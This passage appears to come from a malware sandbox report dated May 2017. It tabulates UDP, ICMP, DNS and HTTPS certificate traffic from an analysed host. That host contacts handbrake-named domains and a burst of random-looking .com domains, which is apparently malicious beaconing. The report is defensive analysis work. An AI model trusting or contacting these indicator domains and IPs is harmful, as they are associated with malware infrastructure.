Mai 9, 2017 16:26:46.514611006 MESZ5017453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.570800066 MESZ53501748.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.570827961 MESZ53565438.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.607861996 MESZ6037153192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.607943058 MESZ53603718.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.646281958 MESZ5058453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.646353960 MESZ53505848.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.653693914 MESZ5360353192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.653769016 MESZ5397253192.168.0.508.8.4.4
Mai 9, 2017 16:26:48.539855957 MESZ53539728.8.4.4192.168.0.50
Mai 9, 2017 16:26:48.539880991 MESZ53536038.8.4.4192.168.0.50

ICMP Packets

TimestampSource IPDest IPChecksumCodeType
Mai 9, 2017 16:25:49.150011063 MESZ192.168.0.5085.17.25.665f7fEcho
Mai 9, 2017 16:26:00.588404894 MESZ192.168.0.50146.0.43.101ed0bEcho
Mai 9, 2017 16:26:47.608148098 MESZ192.168.0.508.8.4.410d5(Port unreachable)Destination Unreachable
Mai 9, 2017 16:26:47.646560907 MESZ192.168.0.508.8.4.43710(Port unreachable)Destination Unreachable

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Mai 9, 2017 16:25:40.101505041 MESZ192.168.0.508.8.8.80xac2cStandard query (0)script.google.comA (IP address)IN (0x0001)
Mai 9, 2017 16:25:40.101547003 MESZ192.168.0.508.8.8.80x879Standard query (0)script.google.com28IN (0x0001)
Mai 9, 2017 16:25:42.532700062 MESZ192.168.0.508.8.8.80x646eStandard query (0)script.googleusercontent.comA (IP address)IN (0x0001)
Mai 9, 2017 16:25:42.532779932 MESZ192.168.0.508.8.8.80x1029Standard query (0)script.googleusercontent.com28IN (0x0001)
Mai 9, 2017 16:25:47.371352911 MESZ192.168.0.508.8.8.80x1786Standard query (0)handbrake.bizA (IP address)IN (0x0001)
Mai 9, 2017 16:25:47.371386051 MESZ192.168.0.508.8.8.80xef87Standard query (0)handbrake.biz28IN (0x0001)
Mai 9, 2017 16:26:00.207238913 MESZ192.168.0.508.8.8.80xf812Standard query (0)handbrakestore.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:11.675671101 MESZ192.168.0.508.8.8.80x5811Standard query (0)handbrake.ccA (IP address)IN (0x0001)
Mai 9, 2017 16:26:12.677753925 MESZ192.168.0.508.8.8.80x5811Standard query (0)handbrake.ccA (IP address)IN (0x0001)
Mai 9, 2017 16:26:12.999345064 MESZ192.168.0.508.8.4.40x5811Standard query (0)handbrake.ccA (IP address)IN (0x0001)
Mai 9, 2017 16:26:14.201618910 MESZ192.168.0.508.8.8.80xac07Standard query (0)luwenxdsnhgfxckcjgxvtugj.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:14.589282990 MESZ192.168.0.508.8.8.80x2e0eStandard query (0)6gmvshjdfpfbeqktpsde5xav.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:15.623080969 MESZ192.168.0.508.8.8.80x5c6fStandard query (0)kjfnbfhu7ndudgzhxpwnnqkc.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:16.646783113 MESZ192.168.0.508.8.8.80x2939Standard query (0)yaxw8dsbttpwrwlq3h6uc9eq.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:17.609131098 MESZ192.168.0.508.8.8.80x7Standard query (0)qrtfvfysk4bdcwwwe9pxmqe9.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:18.753406048 MESZ192.168.0.508.8.8.80x7Standard query (0)qrtfvfysk4bdcwwwe9pxmqe9.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:21.769840002 MESZ192.168.0.508.8.4.40x7Standard query (0)qrtfvfysk4bdcwwwe9pxmqe9.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:22.904309034 MESZ192.168.0.508.8.4.40x7Standard query (0)qrtfvfysk4bdcwwwe9pxmqe9.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:23.624594927 MESZ192.168.0.508.8.4.40x602Standard query (0)fyamakgtrrjt9vrwhmc76v38.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:24.756298065 MESZ192.168.0.508.8.4.40x602Standard query (0)fyamakgtrrjt9vrwhmc76v38.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:27.900372982 MESZ192.168.0.508.8.8.80x602Standard query (0)fyamakgtrrjt9vrwhmc76v38.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.042088032 MESZ192.168.0.508.8.8.80x602Standard query (0)fyamakgtrrjt9vrwhmc76v38.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.625832081 MESZ192.168.0.508.8.8.80x2c14Standard query (0)kcdjzquvhsua6hlfbmjzkzsb.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:30.594083071 MESZ192.168.0.508.8.8.80xdcb1Standard query (0)ypu4vwlenkpt29f95etrqllq.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:31.735508919 MESZ192.168.0.508.8.8.80xdcb1Standard query (0)ypu4vwlenkpt29f95etrqllq.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:34.873931885 MESZ192.168.0.508.8.4.40xdcb1Standard query (0)ypu4vwlenkpt29f95etrqllq.comA (IP address)IN (0x0001)
Mai 9, 2017 16:26:35.905143976 MESZ192.168.0.508.8.4.40xdcb1Standard query (0)ypu4vwlenkpt29f95etrqllq.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Mai 9, 2017 16:25:40.565378904 MESZ8.8.8.8192.168.0.500x879Name error (3)script.google.comnonenone28IN (0x0001)
Mai 9, 2017 16:25:40.565418005 MESZ8.8.8.8192.168.0.500xac2cNo error (0)script.google.com216.58.204.142A (IP address)IN (0x0001)
Mai 9, 2017 16:25:43.600469112 MESZ8.8.8.8192.168.0.500x1029Name error (3)script.googleusercontent.comnonenone28IN (0x0001)
Mai 9, 2017 16:25:43.600500107 MESZ8.8.8.8192.168.0.500x646eNo error (0)script.googleusercontent.com216.58.204.129A (IP address)IN (0x0001)
Mai 9, 2017 16:25:47.582999945 MESZ8.8.8.8192.168.0.500xef87Name error (3)handbrake.biznonenone28IN (0x0001)
Mai 9, 2017 16:25:47.583029985 MESZ8.8.8.8192.168.0.500x1786No error (0)handbrake.biz85.17.25.66A (IP address)IN (0x0001)
Mai 9, 2017 16:26:00.587764025 MESZ8.8.8.8192.168.0.500xf812No error (0)handbrakestore.com146.0.43.101A (IP address)IN (0x0001)
Mai 9, 2017 16:26:12.998739004 MESZ8.8.8.8192.168.0.500x5811Server failure (2)handbrake.ccnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:13.630573988 MESZ8.8.8.8192.168.0.500x5811Server failure (2)handbrake.ccnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:13.630601883 MESZ8.8.4.4192.168.0.500x5811Server failure (2)handbrake.ccnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:14.573122025 MESZ8.8.8.8192.168.0.500xac07Name error (3)luwenxdsnhgfxckcjgxvtugj.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:15.562796116 MESZ8.8.8.8192.168.0.500x2e0eName error (3)6gmvshjdfpfbeqktpsde5xav.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:16.568062067 MESZ8.8.8.8192.168.0.500x5c6fName error (3)kjfnbfhu7ndudgzhxpwnnqkc.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:17.554605961 MESZ8.8.8.8192.168.0.500x2939Name error (3)yaxw8dsbttpwrwlq3h6uc9eq.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:23.564397097 MESZ8.8.4.4192.168.0.500x7Name error (3)qrtfvfysk4bdcwwwe9pxmqe9.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:23.564429998 MESZ8.8.4.4192.168.0.500x7Name error (3)qrtfvfysk4bdcwwwe9pxmqe9.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:23.564450026 MESZ8.8.8.8192.168.0.500x7Name error (3)qrtfvfysk4bdcwwwe9pxmqe9.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:23.564467907 MESZ8.8.8.8192.168.0.500x7Name error (3)qrtfvfysk4bdcwwwe9pxmqe9.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.559004068 MESZ8.8.8.8192.168.0.500x602Name error (3)fyamakgtrrjt9vrwhmc76v38.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.559037924 MESZ8.8.8.8192.168.0.500x602Name error (3)fyamakgtrrjt9vrwhmc76v38.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.559055090 MESZ8.8.4.4192.168.0.500x602Name error (3)fyamakgtrrjt9vrwhmc76v38.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:29.559072018 MESZ8.8.4.4192.168.0.500x602Name error (3)fyamakgtrrjt9vrwhmc76v38.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:30.564300060 MESZ8.8.8.8192.168.0.500x2c14Name error (3)kcdjzquvhsua6hlfbmjzkzsb.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:36.557574987 MESZ8.8.4.4192.168.0.500xdcb1Name error (3)ypu4vwlenkpt29f95etrqllq.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:36.557610035 MESZ8.8.4.4192.168.0.500xdcb1Name error (3)ypu4vwlenkpt29f95etrqllq.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:36.557629108 MESZ8.8.8.8192.168.0.500xdcb1Name error (3)ypu4vwlenkpt29f95etrqllq.comnonenoneA (IP address)IN (0x0001)
Mai 9, 2017 16:26:36.557648897 MESZ8.8.8.8192.168.0.500xdcb1Name error (3)ypu4vwlenkpt29f95etrqllq.comnonenoneA (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Mai 9, 2017 16:25:41.716892004 MESZ44349294216.58.204.142192.168.0.50CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=USCN=Google Internet Authority G2, O=Google Inc, C=USThu Apr 27 10:30:00 CEST 2017Thu Jul 20 10:30:00 CEST 2017[[ Version: V3 Subject: CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun EC public key, 256 bits public x coord: 85623510483166119386180860335542551608734201046914110746253798299245311566584 public y coord: 58102136147754089152697687182402606064797988381959451819186790149990798220911 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Thu Apr 27 10:30:00 CEST 2017, To: Thu Jul 20 10:30:00 CEST 2017] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 53413d91 78d28c27]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.google.com DNSName: *.android.com DNSName: *.appengine.google.com DNSName: *.cloud.google.com DNSName: *.gcp.gvt2.com DNSName: *.google-analytics.com DNSName: *.google.ca DNSName: *.google.cl DNSName: *.google.co.in DNSName: *.google.co.jp DNSName: *.google.co.uk DNSName: *.google.com.ar DNSName: *.google.com.au DNSName: *.google.com.br DNSName: *.google.com.co DNSName: *.google.com.mx DNSName: *.google.com.tr DNSName: *.google.com.vn DNSName: *.google.de DNSName: *.google.es DNSName: *.google.fr DNSName: *.google.hu DNSName: *.google.it DNSName: *.google.nl DNSName: *.google.pl DNSName: *.google.pt DNSName: *.googleadapis.com DNSName: *.googleapis.cn DNSName: *.googlecommerce.com DNSName: *.googlevideo.com DNSName: *.gstatic.cn DNSName: *.gstatic.com DNSName: *.gvt1.com DNSName: *.gvt2.com DNSName: *.metric.gstatic.com DNSName: *.urchin.com DNSName: *.url.google.com DNSName: *.youtube-nocookie.com DNSName: *.youtube.com DNSName: *.youtubeeducation.com DNSName: *.ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: developers.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: source.android.google.cn DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: FD 5A 12 80 0B CD 04 5F F2 4D 59 28 03 70 23 57 .Z....._.MY(.p#W0010: 19 40 F8 37 .@.7]]] Algorithm: [SHA256withRSA] Signature:0000: 21 C8 A9 69 CE 02 9B 78 BD C0 33 3A 75 51 3A 77 !..i...x..3:uQ:w0010: 54 A8 E8 70 43 4A B2 6C 8C EF 8C 3A F1 76 05 57 T..pCJ.l...:.v.W0020: 97 4B 3E E4 64 4F FD A8 D0 27 6F F8 0F 88 D0 F0 .K>.dO...'o.....0030: 6A 4D 75 79 B2 3A 58 F5 B3 A2 FB 0A 47 CA C5 46 jMuy.:X.....G..F0040: 90 85 A2 C5 80 39 6F B4 A3 06 3F 98 30 E1 85 CF .....9o...?.0...0050: 9C 8E 93 9B A4 EA 96 5F C2 CC 24 AE 0B 51 08 6B ......._..$..Q.k0060: 7F B5 84 D8 E6 E8 1D 98 01 2E 98 A2 B9 69 E5 88 .............i..0070: F5 85 3F 86 5C F2 D9 07 1A 40 84 F8 7E BB 72 38 ..?.\....@....r80080: C0 F0 46 D5 8C 5A 13 17 21 9B DC 4F 5D F9 FC B8 ..F..Z..!..O]...0090: BE 3C 2D 7B F6 B6 CC E8 2D 6F D6 BB F7 C3 D7 3C .<-.....-o.....<00A0: 58 78 0C F1 00 36 BD B8 C8 8A 38 3A 0F D3 3E EF Xx...6....8:..>.00B0: DC 18 E0 8E 9F C7 66 7E 09 C7 D4 3C A3 7B C3 EB ......f....<....00C0: EF D2 08 18 AC 3F 77 D8 E9 01 08 65 15 96 0A 4B .....?w....e...K00D0: 24 F3 2D F1 F3 BF FE DD 85 0B 88 52 40 32 DE DD $.-........R@2..00E0: 30 B8 30 B7 9B E4 CC 20 B1 D1 8B 56 0F BE 76 E9 0.0.... ...V..v.00F0: 5B 92 7C 84 DA 32 49 6E 98 3F C4 08 42 13 AB 3E [....2In.?..B..>]
Mai 9, 2017 16:25:41.716892004 MESZ44349294216.58.204.142192.168.0.50CN=Google Internet Authority G2, O=Google Inc, C=USCN=GeoTrust Global CA, O=GeoTrust Inc., C=USWed Apr 01 02:00:00 CEST 2015Mon Jan 01 00:59:59 CET 2018[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Wed Apr 01 02:00:00 CEST 2015, To: Mon Jan 01 00:59:59 CET 2018] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 023a92]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: 08 4E 04 A7 80 7F 10 16 43 5E 02 AD D7 42 80 F4 .N......C^...B..0010: B0 8E D2 AE B3 EB 11 7D 90 84 18 7D E7 90 15 FB ................0020: 49 7F A8 99 05 91 BB 7A C9 D6 3C 37 18 09 9A B6 I......z..<7....0030: C7 92 20 07 35 33 09 E4 28 63 72 0D B4 E0 32 9C .. .53..(cr...2.0040: 87 98 C4 1B 76 89 67 C1 50 58 B0 13 AA 13 1A 1B ....v.g.PX......0050: 32 A5 BE EA 11 95 4C 48 63 49 E9 99 5D 20 37 CC 2.....LHcI..] 7.0060: FE 2A 69 51 16 95 4B A9 DE 49 82 C0 10 70 F4 2C .*iQ..K..I...p.,0070: F3 EC BC 24 24 D0 4E AC A5 D9 5E 1E 6D 92 C1 A7 ...$$.N...^.m...0080: AC 48 35 81 F9 E5 E4 9C 65 69 CD 87 A4 41 50 3F .H5.....ei...AP?0090: 2E 57 A5 91 51 12 58 0E 8C 09 A1 AC 7A A4 12 A5 .W..Q.X.....z...00A0: 27 F3 9A 10 97 7D 55 03 06 F7 66 58 5F 5F 64 E1 '.....U...fX__d.00B0: AB 5D 6D A5 39 48 75 98 4C 29 5A 3A 8D D3 2B CA .]m.9Hu.L)Z:..+.00C0: 9C 55 04 BF F4 E6 14 D5 80 AC 26 ED 17 89 A6 93 .U........&.....00D0: 6C 5C A4 CC B8 F0 66 8E 64 E3 7D 9A E2 00 B3 49 l\....f.d......I00E0: C7 E4 0A AA DD 5B 83 C7 70 90 46 4E BE D0 DB 59 .....[..p.FN...Y00F0: 96 6C 2E F5 16 36 DE 71 CC 01 C2 12 C1 21 C6 16 .l...6.q.....!..]
Mai 9, 2017 16:25:41.716892004 MESZ44349294216.58.204.142192.168.0.50CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Mai 9, 2017 16:25:44.721575022 MESZ44349295216.58.204.129192.168.0.50CN=*.googleusercontent.com, O=Google Inc, L=Mountain View, ST=California, C=USCN=Google Internet Authority G2, O=Google Inc, C=USThu Apr 27 10:43:19 CEST 2017Thu Jul 20 10:31:00 CEST 2017[[ Version: V3 Subject: CN=*.googleusercontent.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun EC public key, 256 bits public x coord: 63083806978049890819295239586389245445757266763603582814251997939456093122126 public y coord: 103192205656773482751916043823371474978634230849729320284172575155995666050958 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Thu Apr 27 10:43:19 CEST 2017, To: Thu Jul 20 10:31:00 CEST 2017] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 5071a22c 88411ac0]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.googleusercontent.com DNSName: *.apps.googleusercontent.com DNSName: *.appspot.com.storage.googleapis.com DNSName: *.blogspot.com DNSName: *.bp.blogspot.com DNSName: *.commondatastorage.googleapis.com DNSName: *.content-storage-download.googleapis.com DNSName: *.content-storage-upload.googleapis.com DNSName: *.content-storage.googleapis.com DNSName: *.doubleclickusercontent.com DNSName: *.ggpht.com DNSName: *.googledrive.com DNSName: *.googlesyndication.com DNSName: *.googleweblight.com DNSName: *.safenup.googleusercontent.com DNSName: *.sandbox.googleusercontent.com DNSName: *.storage-download.googleapis.com DNSName: *.storage-upload.googleapis.com DNSName: *.storage.googleapis.com DNSName: *.storage.select.googleapis.com DNSName: blogspot.com DNSName: bp.blogspot.com DNSName: commondatastorage.googleapis.com DNSName: doubleclickusercontent.com DNSName: ggpht.com DNSName: googledrive.com DNSName: googleusercontent.com DNSName: googleweblight.com DNSName: static.panoramio.com.storage.googleapis.com DNSName: storage.googleapis.com DNSName: storage.select.googleapis.com DNSName: unfiltered.news][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 03 AB 28 FB F6 09 2D 79 D7 B5 F5 E4 8B 84 43 56 ..(...-y......CV0010: 2E 8D 5F D2 .._.]]] Algorithm: [SHA256withRSA] Signature:0000: 37 D1 3A EA 34 52 DB DB 28 DF 92 E1 17 1B D0 EC 7.:.4R..(.......0010: 70 0E DC 90 59 4C 91 03 69 A0 8F 0F 08 8A 32 DE p...YL..i.....2.0020: 06 3F 99 76 33 09 8F 3E 28 86 9F 37 A7 52 A8 25 .?.v3..>(..7.R.%0030: 53 8D EF 8F E3 04 B9 14 D6 43 4A D8 99 DB 73 5F S........CJ...s_0040: EA 8E 31 7E 46 FB AE 06 2C 03 BF 08 2A 33 DF 4D ..1.F...,...*3.M0050: 50 35 96 D4 08 A4 E8 2E C4 18 50 4D 08 AF 9C B8 P5........PM....0060: 70 51 A0 81 25 AA 44 C9 49 63 AC 9C 20 43 4A 29 pQ..%.D.Ic.. CJ)0070: D8 9E ED AC 77 3B C0 44 77 97 07 8B C3 39 17 D6 ....w;.Dw....9..0080: 18 E4 02 C6 2D 95 64 83 16 C0 CB C1 40 10 32 CC ....-.d.....@.2.0090: F3 E8 7C E1 F1 E7 66 FF 4A 8A 62 D9 FB 5A C2 E2 ......f.J.b..Z..00A0: D4 3A 8B 0B 31 D0 A7 0D 25 50 85 55 BA F8 FD F1 .:..1...%P.U....00B0: D5 13 C7 99 A6 0A 01 8E 0D 70 FB D4 69 CF C1 86 .........p..i...00C0: 92 5F 75 13 70 F1 C9 99 DD 2C DB A8 F4 6C F7 20 ._u.p....,...l. 00D0: 66 0C 94 5B 7B 89 2B 31 A9 00 10 33 83 39 FD B5 f..[..+1...3.9..00E0: FA E0 B5 BB D2 44 72 50 B8 EC E0 60 33 AC FB 63 .....DrP...`3..c00F0: 0B 4E 1E 8C 5F 0D 64 7D 8D FC 09 E2 1A 9F 08 D7 .N.._.d.........]
Mai 9, 2017 16:25:44.721575022 MESZ44349295216.58.204.129192.168.0.50CN=Google Internet Authority G2, O=Google Inc, C=USCN=GeoTrust Global CA, O=GeoTrust Inc., C=USWed Apr 01 02:00:00 CEST 2015Mon Jan 01 00:59:59 CET 2018[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Wed Apr 01 02:00:00 CEST 2015, To: Mon Jan 01 00:59:59 CET 2018] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 023a92]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 